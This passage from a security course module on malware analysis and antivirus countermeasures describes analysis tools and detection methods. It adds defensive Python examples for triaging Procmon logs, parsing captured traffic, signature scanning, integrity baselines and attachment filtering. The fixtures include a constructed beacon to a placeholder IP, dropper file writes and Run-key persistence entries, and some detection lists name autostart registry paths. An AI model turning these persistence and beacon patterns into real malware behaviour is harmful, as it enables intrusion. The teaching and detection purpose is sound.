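# BinText showed for setup.exe in the screenshot (DOS stub text, section
# names, an import, and two UTF-16LE strings).
SAMPLE_UNPACKED = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"!This program cannot be run in DOS mode.\r\n$"
    + b"\x00" * 8
    + b".text\x00\x00\x00" + b".rdata\x00\x00"
    + b"IsProcessorFeaturePresent\x00KERNEL32.dll\x00\x00"
    + "FilesToDelete".encode("utf-16-le") + b"\x00\x00"
    + "LoggingFlags".encode("utf-16-le") + b"\x00\x00"
    + bytes(range(32))
)

# Constructed sample of what the same file looks like after UPX packing: the
# readable strings are gone, UPX section names and marker remain, and the
# body is high-entropy (a pseudo-random filler stands in for compressed data).
SAMPLE_PACKED = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"!This program cannot be run in DOS mode.\r\n$\x00\x00"
    + b"UPX0\x00\x00\x00\x00" + b"UPX1\x00\x00\x00\x00"
    + b"UPX!\x0d\x09\x02\x0a"
    + bytes((i * 73 + 11) % 256 for i in range(1024))
)

if __name__ == "__main__":
    for name, blob in (("unpacked", SAMPLE_UNPACKED), ("packed", SAMPLE_PACKED)):
        print(name, packing_indicators(blob))
        print("  ascii:", ascii_strings(blob))
        print("  unicode:", unicode_strings(blob))
```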
Malware Analysis Procedure (Cont'd)
3. Set up network connection and check that it is not giving any errors
4. Run the virus and monitor the process actions and system information with the help of process monitoring tools such as Process Monitor and Process Explorer
Malware Analysis Procedure (Cont'd)
Step 3: Set up network connection and check that it is not giving any errors
Step 4: Run the virus and monitor the process actions and system information with the help of process monitoring tools such as Process Monitor and Process Explorer
Process Monitor
Source: http://technet.microsoft.com
Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, registry, and process/thread activity.
FIGURE 7.28: Process Monitor Screenshot. Process Monitor (Sysinternals: www.sysinternals.com) showing 89,723 of 186,768 events (48%) with the columns Time of Day, Process Name, PID, Operation, Path, Result, and Detail; the visible rows are Explorer.EXE (PID 2384) CreateFileMapping, CloseFile and CreateFile on C:\Windows\System32\imageres.dll, mmc.exe (PID 4100) ReadFile on files under C:\Windows\Microsoft.NET\Framework, and firefox.exe (PID 2760) TCP Receive and TCP Send between WIN-MSSELCK4K41:1056 and :1055, all with result SUCCESS.
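Process Monitor can save a capture as CSV, and the rows that matter for step 4 can then be picked out mechanically. The example below is added here and is not code from the module or from Sysinternals: it reads such an export and tags process creation, executables written to system or temp/startup directories, Run-key persistence, and outbound traffic. It assumes Procmon's default CSV columns (Time of Day, Process Name, PID, Operation, Path, Result, Detail); the log lines, the hostname and the address are constructed, not captured from a real sample.

```python
"""Triage a Process Monitor CSV export for the behaviours step 4 watches
for: processes spawned, executables dropped, persistence written to the
registry, and network traffic.

Added example; not code from the CEH module or from Sysinternals. Assumes
Procmon's default CSV export columns; the log lines below are constructed
for this example and are not from a real capture.
"""
import csv
import io
from typing import Dict, List

EXEC_EXTS = (".exe", ".dll", ".sys", ".scr")
# Registry locations commonly used for persistence (lower-cased substrings of Path).
PERSISTENCE_KEYS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\", "\\services\\")
SYSTEM_DIR = "c:\\windows\\"
USER_DIRS = ("\\appdata\\local\\temp\\", "c:\\windows\\temp\\", "\\startup\\")
NETWORK_OPS = ("TCP Connect", "TCP Send", "UDP Send")


def classify(event: Dict[str, str]) -> str:
    """Return a tag for a noteworthy event, or '' if the row is routine."""
    if event["Result"] != "SUCCESS":
        return ""
    op = event["Operation"]
    path = event["Path"].lower()
    detail = event["Detail"].lower()
    if op == "Process Create":
        return "process-spawn"
    if path.endswith(EXEC_EXTS):
        # Opening an existing DLL is normal; creating or writing an executable is not.
        created = op == "CreateFile" and (
            "disposition: create" in detail or "disposition: overwriteif" in detail)
        if created or op == "WriteFile":
            if path.startswith(SYSTEM_DIR):
                return "drop-in-system-dir"
            if any(d in path for d in USER_DIRS):
                return "drop-in-temp-or-startup"
            return "drop-executable"
    if op == "RegSetValue" and any(k in path for k in PERSISTENCE_KEYS):
        return "persistence-registry"
    if op in NETWORK_OPS:
        return "network"
    return ""


def triage(csv_text: str) -> List[Dict[str, str]]:
    """Parse the export and keep only the events that classify() tags."""
    findings: List[Dict[str, str]] = []
    for event in csv.DictReader(io.StringIO(csv_text)):
        tag = classify(event)
        if tag:
            findings.append({"time": event["Time of Day"], "process": event["Process Name"],
                             "pid": event["PID"], "tag": tag, "path": event["Path"]})
    return findings


def by_process(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Count flagged events per process so the sample's own process stands out."""
    counts: Dict[str, int] = {}
    for finding in findings:
        counts[finding["process"]] = counts.get(finding["process"], 0) + 1
    return counts


# Constructed Procmon export: benign rows like those in the screenshot, plus rows
# for a hypothetical sample.exe. ANALYSIS-VM and 203.0.113.7 are placeholders.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"12:13:46.6201234 PM","Explorer.EXE","2384","CreateFileMapping","C:\Windows\System32\imageres.dll","SUCCESS","SyncType: SyncTypeCreateSection, PageProtection: PAGE_READONLY"
"12:13:46.6212345 PM","mmc.exe","4100","ReadFile","C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll","SUCCESS","Offset: 7,623,168, Length: 32,768"
"12:13:47.0001111 PM","sample.exe","3320","Process Create","C:\Windows\System32\cmd.exe","SUCCESS","PID: 3412, Command line: C:\Windows\System32\cmd.exe"
"12:13:47.0102222 PM","sample.exe","3320","CreateFile","C:\Windows\System32\drivers\sampledrv.sys","SUCCESS","Desired Access: Generic Write, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, OpenResult: Created"
"12:13:47.0203333 PM","sample.exe","3320","RegSetValue","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater","SUCCESS","Type: REG_SZ, Length: 96, Data: C:\Users\Administrator\AppData\Local\Temp\upd.exe"
"12:13:47.0304444 PM","sample.exe","3320","WriteFile","C:\Users\Administrator\AppData\Local\Temp\upd.exe","SUCCESS","Offset: 0, Length: 24,576"
"12:13:47.0405555 PM","sample.exe","3320","TCP Send","ANALYSIS-VM:49213 -> 203.0.113.7:80","SUCCESS","Length: 412, startime: 1138, endtime: 1138, seqnum: 0, connid: 0"
"12:13:47.0506666 PM","firefox.exe","2760","TCP Receive","ANALYSIS-VM:1056 -> ANALYSIS-VM:1055","SUCCESS","Length: 1, seqnum: 0, connid: 0"
"12:13:47.0607777 PM","sample.exe","3320","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Attributes, Disposition: Open, Options: Open Reparse Point, OpenResult: Opened"
'''

if __name__ == "__main__":
    hits = triage(SAMPLE_CSV)
    for hit in hits:
        print(f"{hit['time']} {hit['process']}({hit['pid']}) {hit['tag']}: {hit['path']}")
    print(by_process(hits))
```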
Malware Analysis Procedure (Cont'd)
5. Record network traffic information using the connectivity and log packet content monitoring tools such as NetResident and TCPView
6. Determine the files added, processes spawned, and changes to the registry with the help of registry monitoring tools such as RegShot
Malware Analysis Procedure (Cont'd)
Step 5: Record network traffic information using connectivity and log packet content monitoring tools such as NetResident and TCPView
Step 6: Determine the files added, processes spawned, and changes to the registry with the help of registry monitoring tools such as RegShot
NetResident

Source: http://www.tamos.com

NetResident is a network content analysis application designed to monitor, store, and reconstruct a wide range of network events and activities, such as email messages, web pages, downloaded files, instant messages, and VoIP conversations. It uses advanced monitoring technology to capture the data on the network, saves the data to a database, reconstructs it, and displays the content.
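The following Python script is an added example (it is not part of the course material and not NetResident's code). It shows the kind of record Step 5 is after: captured HTTP requests are parsed into a connection table in the same shape as NetResident's Party A / Port A / Party B / Port B view, the request URL and POST form fields are extracted, and the traits an analyst checks first (non-standard port, raw IP instead of a host name, outbound POST with data) are flagged. Both captured conversations, including the host names, ports and the cid value, are constructed for the example.

```python
"""Turn captured HTTP requests into connection records (added example)."""
import ipaddress
from urllib.parse import parse_qs

# Constructed sample captures (not real traffic): each entry is one TCP
# conversation as a sniffer would record it, plus the raw request bytes.
SAMPLE_CAPTURES = [
    {
        "party_a": "WIN-LXQN3", "port_a": 1104,
        "party_b": "74.125.236.52", "port_b": 80,
        "raw": (b"POST /news/xhr/rhc?authuser=0 HTTP/1.1\r\n"
                b"Host: news.google.co.in\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\n"
                b"Content-Length: 21\r\n"
                b"\r\n"
                b"cid=52777990230736.52"),
    },
    {
        # Hypothetical beacon: raw IP, non-standard port, no Host header.
        "party_a": "WIN-LXQN3", "port_a": 1205,
        "party_b": "203.0.113.7", "port_b": 8080,
        "raw": (b"GET /gate.php?id=7f3a HTTP/1.0\r\n"
                b"User-Agent: Mozilla/4.0\r\n"
                b"\r\n"),
    },
]


def parse_http_request(raw: bytes) -> dict:
    """Split one HTTP/1.x request into method, target, headers, body and form fields."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        form = {k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()}
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body, "form": form}


def suspicious_flags(record: dict) -> list:
    """Cheap triage hints; they are leads for the analyst, not verdicts."""
    flags = []
    if record["port_b"] not in (80, 443):
        flags.append("non-standard web port")
    try:
        ipaddress.ip_address(record["party_b"])
        flags.append("remote side addressed by raw IP, no host name")
    except ValueError:
        pass  # a host name, not an IP literal
    if record["method"] == "POST" and record["form"]:
        flags.append("outbound POST carrying form data")
    return flags


def connection_record(capture: dict) -> dict:
    """Build one NetResident-style row from a captured conversation."""
    req = parse_http_request(capture["raw"])
    # Prefer the Host header; fall back to the peer address when it is absent.
    host = req["headers"].get("host", capture["party_b"])
    port = capture["port_b"]
    authority = host if port == 80 else f"{host}:{port}"
    record = {
        "party_a": capture["party_a"], "port_a": capture["port_a"],
        "party_b": host, "port_b": port, "protocol": "Web",
        "method": req["method"], "url": f"http://{authority}{req['target']}",
        "form": req["form"],
    }
    record["flags"] = suspicious_flags(record)
    return record


def build_table(captures=SAMPLE_CAPTURES) -> list:
    """One row per captured conversation, ready to log or export."""
    return [connection_record(c) for c in captures]


if __name__ == "__main__":
    for row in build_table():
        print(f"{row['party_a']}:{row['port_a']} -> {row['party_b']}:{row['port_b']} "
              f"{row['method']} {row['url']} form={row['form']} flags={row['flags']}")
```

The parser deliberately ignores Content-Length and splits on the blank line, because captured requests from malware are often truncated or malformed and an analyst wants whatever bytes were actually seen. The flags are hints to investigate, not a detection verdict: plenty of legitimate software POSTs form data.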
[Screenshot: NetResident (evaluation version), Events view. The table lists Web-protocol connections dated 10/5/2012 2:14 to 2:15 from host WIN-LXQN3 (ports 1076 to 1205) to remote parties maa03s04-in... and mystart-ton... on ports 80 and 443. The Event Detail pane shows "POST request to http://news.google.co.in/news/xhr/rhc?authuser=0" with tag cid and value 52777990230736.52777991632076.52777992527295.52777984808514.52777983170746.52777984394614; status bar: Connected, 180 bytes, 1,067,459.]

FIGURE 7.29: NetResident Screenshot
Malware Analysis Procedure (Cont'd)

Step 7: Collect the following information using debugging tools such as OllyDbg and ProcDump:

• Service requests
• Attempts for incoming and outgoing connections
• DNS tables information
OllyDbg

Source: http://www.ollydbg.de

OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft Windows. Its emphasis on binary code analysis makes it particularly useful in cases where source is unavailable.
[Screenshot: OllyDbg main window (CPU - main thread, module OLLYDBG) with the File, View, Debug, Plugins, Options, Window and Help menus. The disassembly pane shows a routine around 00401000 to 00401124 (PUSH ECX, CALL <JMP.&KERNEL32.GetProcessHeap>, XOR EDX,EDX, conditional jumps, RETN); the register pane shows EAX, ECX, EDX and ESP (0018FF88), segment registers, the flags, LastErr ERROR_MOD_NOT_FOUND (0000007E) and the FPU registers ST0 to ST7; the stack pane ends with "RETURN to 0019FF9C".]

FIGURE 7.30: OllyDbg Screenshot
Virus Analysis Tool: IDA Pro

Source: http://www.hex-rays.com

IDA Pro is a disassembler and debugger that supports both Windows and Linux platforms.

Disassembler

The disassembler displays the instructions a program executes in symbolic form, even when only the binary code is available, and presents the processor's execution flow as maps. It enables its users to identify viruses as well: for example, if a screensaver or "gif" file is trying to spy on the user's internal applications, IDA Pro reveals this. IDA Pro is developed with the latest techniques that enable it to trace difficult binary code, which is displayed in readable execution maps.

Debugger

The debugger is an interactive tool that complements the static analysis performed by the disassembler. By single-stepping through the code under investigation, it often bypasses obfuscation (the code can be examined in memory after it has unpacked itself) and exposes data that the disassembler can then process in depth.
IDA Pro allows you to explore software internals and vulnerabilities and to evaluate a program's tamper resistance. It is an interactive, programmable, multi-processor disassembler coupled to a local and remote debugger and augmented by a complete plugin programming environment. It can also be used to verify what software does with your data and so protect your privacy. It is used by antivirus companies, research companies, software development companies, agencies, and military organizations.

[Screenshot: IDA 6.3 demo loading C:\Program Files (x86)\IDA Demo 6.3\qwingraph.exe. The Functions window lists sub_401070 through sub_403B30; IDA View-A shows the prologue of WinMain (stack variables var_C, var_8, hInstance, hPrevInstance, lpCmdLine, nShowCmd) calling GetCommandLineW, QString::fromWCharArray and QString::toLocal8Bit; the Output window reports execution of onload.idc and ida.idc, "IDA is analysing the input file... You may start to explore the input file right now." and "Using FLIRT signature: Microsoft VisualC 2-10/net runtime".]
Online Malware Testing: VirusTotal

VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the detection of viruses, worms, Trojans, etc.

[Screenshot: VirusTotal file analysis page (https://www.virustotal.com) showing the sample's SHA256, file name, detection ratio and analysis date (2012-07-17 UTC), followed by per-engine results with update dates: AhnLab-V3 (Win-Trojan/MoSucker, 20120716), AntiVir (20120716), Antiy-AVL (Backdoor/Win32.MoSucker.gen, 20120717), Avast (Win32:Trojan-gen, 20120716) and AVG (BackDoor.MoSucker, 20120716).]
Online Malware Testing: VirusTotal

Source: http://www.virustotal.com

VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, Trojans, and all kinds of malware detected by antivirus engines. Features:

• Free and independent service
• Uses multiple antivirus engines
• Comprised of real-time automatic updates of virus signatures
• Gives detailed results from each antivirus engine
• Has real-time global statistics

Note that files submitted to VirusTotal are shared with the participating antivirus vendors and security researchers. Uploading a sample from a targeted intrusion can therefore reveal to the attacker that it has been discovered; searching by the file's hash first avoids exposing the file itself.
[Screenshot: VirusTotal analysis results page at full width, repeating the per-engine detections for the MoSucker sample and the prompt to scan a URL or search through the VirusTotal dataset.]

FIGURE 7.32: VirusTotal Screenshot
Online Malware Analysis Services

Online malware analysis services allow you to scan files and resources and secure them before attackers compromise them. A few online malware analysis services are listed as follows:

• Anubis: Analyzing Unknown Binaries available at http://anubis.iseclab.org
• Avast! Online Scanner available at http://onlinescan.avast.com
• Malware Protection Center available at https://www.microsoft.com
• ThreatExpert available at http://www.threatexpert.com
• Dr. Web Online Scanners available at http://vms.drweb.com
• Metascan Online available at http://www.metascan-online.com
• Bitdefender QuickScan available at http://www.bitdefender.com
• GFI SandBox available at http://www.gfi.com
• UploadMalware.com available at http://www.uploadmalware.com
• Fortinet available at http://www.fortiguard.com
Module Flow

So far, we have discussed various viruses and worms and malware analysis. Now we will discuss the countermeasures to be applied to protect against viruses and worms, if any are found. These countermeasures help in enhancing security.

• Virus and Worms Concept
• Types of Viruses
• Computer Worms
• Malware Analysis
• Countermeasures
• Penetration Testing

This section highlights various virus and worm countermeasures.
Virus Detection Methods

Scanning: Once a virus has been detected, it is possible to write scanning programs that look for signature strings characteristic of the virus.

Integrity Checking: Integrity checking products work by reading the entire disk and recording integrity data that acts as a signature for the files and system sectors.

Interception: The interceptor monitors the operating system requests that are written to the disk.

A virus scanner is an important piece of software that one should have installed on the PC. Without a scanner, there is a high chance that the system will be hit by and suffer from a virus. A virus protector should be run regularly on the PC, and the scan engine and virus signature database have to be updated often; antivirus software is of no use if it does not know what to look for in the latest virus. One should always remember that an antivirus program cannot stop everything. The rule of thumb is that if an email looks suspicious, e.g., one is not expecting an email from the sender, does not know the sender, or the header looks like something that a known sender would not normally say, one must be careful about opening it, as there is a risk of becoming infected by a virus. The MyDoom worm (detected by Symantec as W32.Novarg.A@mm) infected many Internet users, mostly through email.

The three best methods for antivirus detection are:

• Scanning
• Integrity checking
• Interception

In addition, a combination of these techniques can be more effective.
Scanning

• The moment a virus is detected in the wild, antivirus vendors across the globe start writing scanning programs that look for its signature strings (byte sequences characteristic of the virus).
• The strings are identified and extracted from the virus by these scanner writers. The resulting new scanners search memory, files, and system sectors for the signature strings of the new virus, and declare the presence of a virus once they find a match. Only known and pre-defined viruses can be detected this way.
• Virus writers often create many new viruses by altering an existing one. What looks like a new virus may have taken just a few minutes to create, and attackers make such changes frequently to throw off the scanners.
• In addition to signature recognition, new scanners make use of various other detection techniques such as code analysis: before looking into the code characteristics of a virus, the scanner examines the code at various locations in an executable file.
• In another approach, the scanner sets up a virtual computer in RAM and tests programs by executing them in that virtual space. This technique, called "heuristic scanning" (or emulation), can also be applied to messages that might contain a computer virus or other unwanted content.

The major advantages of scanners are:

• They can check programs before they are executed.
• It is the easiest way to check new software for any known malicious code.

The major drawbacks of scanners are:

• Old scanners can prove unreliable. With the tremendous increase in new viruses, old scanners quickly become obsolete, so it is best to use the latest scanners available on the market.
• Even a new scanner is never equipped to handle all new challenges, since viruses appear more rapidly than new scanners can be developed to battle them.
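The following Python script is an added example (not from the course material or any antivirus product) of the signature scanning described above, including the weakness the text points out: a variant produced by changing a single operand byte slips past an exact byte-string signature, while a signature that wildcards the operand still catches it. The signature notation (hex bytes with "??" for any byte) follows the common ClamAV-style convention; the signatures themselves and the three sample "files" are constructed and hypothetical.

```python
"""Signature scanning with exact and wildcard byte patterns (added example)."""
import re

# Constructed, hypothetical signatures in a ClamAV-like hex notation.
# A ?? token matches any single byte. These are not real AV signatures.
SIGNATURES = {
    "Demo.Dropper.A": "e8 00 00 00 00 5d 81 ed 10 40 00 00",   # exact bytes
    "Demo.Dropper.gen": "e8 00 00 00 00 5d 81 ed ?? ?? ?? ??",  # wildcarded operand
}


def compile_signature(hexsig: str) -> "re.Pattern":
    """Translate 'e8 00 ?? 5d' into a compiled regex over bytes."""
    parts = []
    for tok in hexsig.split():
        if tok == "??":
            parts.append(b".")                        # any one byte
        else:
            parts.append(re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)    # DOTALL: '.' must match 0x0a too


COMPILED = {name: compile_signature(sig) for name, sig in SIGNATURES.items()}


def scan_bytes(data: bytes) -> list:
    """Return the names of all signatures found in data (a file or a memory dump)."""
    return [name for name, pat in COMPILED.items() if pat.search(data)]


def scan_files(files: dict) -> dict:
    """Scan {filename: bytes}; map each name to its matches (empty list = clean)."""
    return {name: scan_bytes(data) for name, data in files.items()}


# Constructed samples. The "virus" body is a typical get-delta prologue
# (call $+5 / pop ebp / sub ebp, imm32); the variant only changes the imm32,
# which is exactly the kind of trivial alteration that defeats an exact signature.
HEADER = b"MZ\x90\x00" + b"\x00" * 12
ORIGINAL = HEADER + b"\xe8\x00\x00\x00\x00\x5d\x81\xed\x10\x40\x00\x00" + b"\xcc" * 8
VARIANT = HEADER + b"\xe8\x00\x00\x00\x00\x5d\x81\xed\x30\x40\x00\x00" + b"\xcc" * 8
CLEAN = HEADER + b"\x55\x8b\xec\x83\xec\x10" + b"\xcc" * 8   # ordinary function prologue

SAMPLE_FILES = {"original.exe": ORIGINAL, "variant.exe": VARIANT, "clean.exe": CLEAN}

if __name__ == "__main__":
    for fname, hits in scan_files(SAMPLE_FILES).items():
        print(f"{fname}: {hits or 'no match'}")
```

Wildcards buy resilience against small edits at the price of a higher false-positive risk, which is why real signatures are long and anchored to code that a variant cannot change without breaking, and why the text recommends combining scanning with other techniques.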
Integrity Checking

• Integrity checking products perform their functions by reading the disk and recording integrity data (such as checksums or cryptographic hashes) to develop a signature or baseline for the files and system sectors.
• Integrity products can check any program without needing to know a specific virus in advance, which is why they come closest to covering all threats to data. The most trusted way to know the amount of damage done by a virus is provided by these integrity checkers, since they can compare the data against the originally established baseline. The baseline must be taken on a known-clean system and stored where malware on the monitored host cannot alter it.
• A disadvantage of a basic integrity checker is that it cannot differentiate file corruption caused by a bug from corruption caused by a virus; to the checker, any change is just a change.
• However, there are some advanced integrity checkers available that are capable of analyzing and identifying the types of changes that viruses make. A few integrity checkers combine some of the antivirus techniques with integrity checking to create a hybrid, which also simplifies the virus checking process.
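The following Python script is an added example (not from the course material, RegShot, or any integrity-checking product) that serves both the integrity checking method described above and Step 6 of the malware analysis procedure (the RegShot-style before/after comparison): it hashes every file under a directory to build a baseline, takes a second snapshot after simulated changes, and reports what was added, removed and modified. The same diff routine is then applied to a constructed pair of registry-style key/value snapshots, since a registry export is also just a mapping of names to values. The directory contents and registry values are constructed for the example.

```python
"""Baseline-and-diff integrity check over files and registry-style values (added example)."""
import hashlib
import pathlib
import tempfile


def hash_file(path: pathlib.Path) -> str:
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot_tree(root) -> dict:
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    root = pathlib.Path(root)
    return {p.relative_to(root).as_posix(): hash_file(p)
            for p in root.rglob("*") if p.is_file()}


def diff_snapshots(before: dict, after: dict) -> dict:
    """Compare two {key: value} snapshots; works for file hashes and registry values alike."""
    return {
        "added": sorted(k for k in after if k not in before),
        "removed": sorted(k for k in before if k not in after),
        "modified": sorted(k for k in before if k in after and before[k] != after[k]),
    }


def demo_filesystem() -> dict:
    """Take a clean baseline, simulate a dropper's changes, and report the delta."""
    with tempfile.TemporaryDirectory() as tmp:
        root = pathlib.Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "notepad.exe").write_bytes(b"MZ original host program")
        (root / "readme.txt").write_text("clean system")
        # In practice the baseline is taken on a known-clean machine and kept
        # off-host (read-only media or another system) so malware cannot rewrite it.
        baseline = snapshot_tree(root)
        # Simulated infection: a DLL is dropped, the host program is patched,
        # and a file is deleted.
        (root / "bin" / "helper.dll").write_bytes(b"MZ dropped payload")
        with open(root / "bin" / "notepad.exe", "ab") as f:
            f.write(b"\xe8\x00\x00\x00\x00")         # appended viral stub
        (root / "readme.txt").unlink()
        return diff_snapshots(baseline, snapshot_tree(root))


# Constructed registry snapshots, modelled on what a RegShot export of a Run key holds.
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
REG_BEFORE = {RUN_KEY + r"\OneDrive": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"}
REG_AFTER = dict(REG_BEFORE)
REG_AFTER[RUN_KEY + r"\svchost"] = r"C:\Users\alice\AppData\Roaming\svchost.exe"  # persistence entry


def demo_registry() -> dict:
    """Diff the two registry snapshots; the new Run value is the persistence mechanism."""
    return diff_snapshots(REG_BEFORE, REG_AFTER)


if __name__ == "__main__":
    print("files:   ", demo_filesystem())
    print("registry:", demo_registry())
```

The diff cannot say whether a modification is malicious, only that it happened; that is the limitation the text notes for basic integrity checkers. Triage therefore focuses on the kinds of changes malware makes: new executables in user-writable directories and new values under autostart keys such as the Run key above.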
Interception

• The main use of an interceptor is for deflecting logic bombs and Trojans.
• The interceptor controls requests to the operating system for network access or for actions that pose a threat to the program. If it finds such a request, the interceptor generally pops up and asks whether the user wants to allow the request to continue. There are no dependable ways to intercept direct branches to low-level code or direct input/output instructions issued by the virus.
• In some cases, the virus is capable of disabling the monitoring program itself. Some years back it took only eight bytes of code to turn off the monitoring functions of a widely used antivirus program.
Virus and Worms Countermeasures

Preventive measures need to be followed in order to lessen the possibility of virus infections and data loss. If certain rules and actions are adhered to, the possibility of falling victim to a virus can be minimized. Some of these methods include:

• Install antivirus software that detects and removes infections as they appear
• Generate an antivirus policy for safe computing and distribute it to the staff
• Pay attention to the instructions while downloading files or any programs from the Internet
• Update the antivirus software regularly (vendors typically publish signature updates at least daily), so that it can identify and clean out new threats
• Avoid opening attachments received from an unknown sender, as viruses spread via email attachments
• Since a virus infection may corrupt data, regularly maintain data backups
• Schedule regular scans for all drives after the installation of antivirus software
• Do not accept disks or programs without checking them first using a current version of an antivirus program
Virus and Worms Countermeasures (Cont'd)

• Ensure the executable code sent to the organization is approved
• Run disk cleanup, a registry scanner, and defragmentation once a week
• Do not boot the machine with an infected bootable system disk
• Turn on the host firewall if the OS used is Windows XP (or later)
• Keep informed about the latest virus threats
• Run an anti-spyware or anti-adware scan once a week
• Check DVDs and CDs for virus infection
• Block files with more than one file type extension (for example, "invoice.pdf.exe")
• Ensure the pop-up blocker is turned on and use an Internet firewall
• Be cautious with files being sent through instant messengers
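The following Python script is an added example (not from the course material) of the two attachment rules above: blocking files with more than one file type extension and requiring approval for executable code. It goes slightly beyond the text in two ways, both labelled in the code: it ignores dots that are not followed by a known extension (so "My.Quarterly.Report.docx" is not a false positive), and it catches whitespace padding used to push the real extension out of view. The extension lists, the allowed "tar.gz" style pairs and the sample file names are constructed and hypothetical; an organisation would tune the lists to the software it approves.

```python
"""Attachment filename policy: double extensions and executable types (added example)."""

# Hypothetical policy lists; tune them to the software your organisation approves.
EXECUTABLE_EXTENSIONS = {
    "exe", "scr", "pif", "com", "bat", "cmd", "vbs", "vbe", "js", "jse",
    "wsf", "wsh", "hta", "msi", "dll", "ps1", "lnk", "cpl", "jar",
}
DATA_EXTENSIONS = {
    "pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf",
    "jpg", "jpeg", "png", "gif", "zip", "7z", "rar", "tar", "gz", "bz2",
}
KNOWN_EXTENSIONS = EXECUTABLE_EXTENSIONS | DATA_EXTENSIONS
# Legitimate stacked extensions that must not be mistaken for a disguise.
ALLOWED_PAIRS = {("tar", "gz"), ("tar", "bz2")}


def analyse_filename(name: str) -> dict:
    """Decide whether an attachment name violates the policy and say why."""
    tokens = name.lower().split(".")
    # Only tokens that are known extensions count, so "quarterly.report.pdf"
    # has one extension while "invoice.pdf.exe" has two.
    exts = [t.strip() for t in tokens[1:] if t.strip() in KNOWN_EXTENSIONS]
    reasons = []
    if exts and exts[-1] in EXECUTABLE_EXTENSIONS:
        reasons.append(f"executable type .{exts[-1]} requires prior approval")
    if len(exts) > 1 and tuple(exts[-2:]) not in ALLOWED_PAIRS:
        reasons.append("more than one file type extension: ." + ".".join(exts))
    # Extension beyond the page's rule: "photo.jpg      .scr" hides .scr behind padding.
    if any(t != t.strip() for t in tokens[1:]):
        reasons.append("whitespace padding pushes the real extension out of view")
    return {"name": name, "extensions": exts, "block": bool(reasons), "reasons": reasons}


def filter_attachments(names) -> dict:
    """Split a batch of attachment names into allowed and blocked."""
    verdicts = [analyse_filename(n) for n in names]
    return {"allowed": [v["name"] for v in verdicts if not v["block"]],
            "blocked": [v["name"] for v in verdicts if v["block"]]}


# Constructed sample batch (not from the page).
SAMPLE_NAMES = ["report.pdf", "invoice.pdf.exe", "archive.tar.gz",
                "My.Quarterly.Report.docx", "setup.exe", "photo.jpg      .scr", "README"]

if __name__ == "__main__":
    for verdict in map(analyse_filename, SAMPLE_NAMES):
        state = "BLOCK" if verdict["block"] else "allow"
        print(f"{state:5} {verdict['name']!r} {verdict['reasons']}")
```

A name-based filter is only the first gate: it says nothing about the bytes inside an allowed ".pdf", so it belongs in front of antivirus scanning rather than in place of it.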
Companion Antivirus: Immunet

Source: http://www.immunet.com

Companion antivirus means that Immunet is compatible with existing antivirus solutions and adds an extra, lightweight layer of protection. According to Immunet, traditional antivirus solutions detect on average only 50% of online threats, leaving most users under-protected, which is why every PC can benefit from its additional layer of security. Immunet Protect's detection relies on two engines: ETHOS, a heuristics-based engine, and SPERO, a cloud-based engine. Users of the Plus version also benefit from a third engine called TETRA, which provides protection when not connected to the Internet.

[Screenshot: Immunet 3.0 console. The Community panel reports 2,478,268 people protected; the Summary and Scan panels show "Scan Complete" for a scan last run 10/5/2012 6:46:50 PM with 203228 files scanned, the threats detected and removed, and an elapsed time of 0:49, next to an offer to upgrade to Immunet Plus 3.0 (advanced rootkit removal, offline protection, technical support).]

FIGURE 7.33: Immunet Screenshot
Antivirus Tools

Antivirus tools prevent, detect, and remove viruses and other malicious code from your system. These tools protect your system by scanning and cleaning incoming and outgoing email messages and instant messenger attachments, and in addition monitor the network's traffic for malicious activity. A few antivirus tools that can be used to detect and remove viruses are listed as follows:

• AVG Antivirus available at http://free.avg.com
• BitDefender available at http://www.bitdefender.com
• Kaspersky Anti-Virus available at http://www.kaspersky.com
• Trend Micro Internet Security Pro available at http://apac.trendmicro.com
• Norton AntiVirus available at http://www.symantec.com
• F-Secure Anti-Virus available at http://www.f-secure.com
• Avast Pro Antivirus available at http://www.avast.com
• McAfee AntiVirus Plus 2013 available at http://home.mcafee.com
• ESET Smart Security 6 available at http://www.eset.com
• Total Defense Internet Security Suite available at http://www.totaldefense.com
Module Flow

Penetration testing must be conducted against viruses and worms, as they are the most widely used means of attack and do not require extensive knowledge to use. Hence, you should conduct pen testing on your system or network before a real attacker exploits it.

• Virus and Worms Concept
• Types of Viruses
• Computer Worms
• Malware Analysis
• Countermeasures
• Penetration Testing

This section provides insight into virus and worm pen testing.
Penetration Testing for Viruses

• Install an anti-virus program on the network infrastructure and on the end-user's system
• Update the anti-virus software to update your virus database with the newly identified viruses
• Scan the system for viruses, which helps to repair damage or delete files infected with viruses
Penetration Testing for Viruses

